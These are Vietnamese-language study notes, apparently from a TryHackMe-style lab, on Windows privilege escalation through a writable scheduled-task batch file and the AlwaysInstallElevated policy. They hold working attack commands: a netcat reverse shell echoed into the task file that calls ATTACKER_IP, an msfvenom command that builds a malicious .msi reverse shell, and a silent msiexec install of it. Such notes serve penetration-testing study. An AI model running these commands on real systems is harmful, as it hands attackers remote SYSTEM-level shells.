Scheduled Tasks

Truy vấn các scheduled task:

schtasks /query

Truy vấn một scheduled task nào đó:

schtasks /query /tn vulntask /fo list /v
Folder: \
HostName:                             THM-PC1
TaskName:                             \vulntask
Task To Run:                          C:\tasks\schtask.bat
Run As User:                          taskusr1

Nếu chúng ta có thể thay đổi trường Task To Run hoặc thay đổi file thực thi của scheduled task thì có thể thực hiện leo thang đặc quyền. Ý tưởng này tương tự với Linux Privilege Escalation - Cron Jobs.

Kiểm tra quyền trên file:

C:\> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Administrators:(I)(F)
                    BUILTIN\Users:(I)(F)

Chữ cái F cho biết người dùng có toàn quyền (Full Access) trên file. Khi đó, ta có thể chỉnh sửa file thực thi tùy ý. Chẳng hạn như tạo một reverse shell:

echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP ATTACKER_PORT > C:\tasks\schtask.bat

Nếu không muốn phải chờ task thực thi, ta có thể chạy task thủ công như sau:

schtasks /run /tn vulntask

Always Install Elevated

Tập tin Windows installer files (.msi) có thể được cấu hình để chạy ở các user có đặc quyền cao hơn user thông thường. Để leo thang đặc quyền thông qua file .msi, ta cần hai registry phải được thiết lập. Hai registry này có thể được truy vấn như sau:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Tạo file .msi để gửi reverse shell sử dụng Metasploit Venom như sau:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

Tất nhiên là ta cũng cần phải sử dụng Metasploit Multi-Handler để nhận rerverse shell.

Chạy file .msi ở target machine như sau:

msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Resources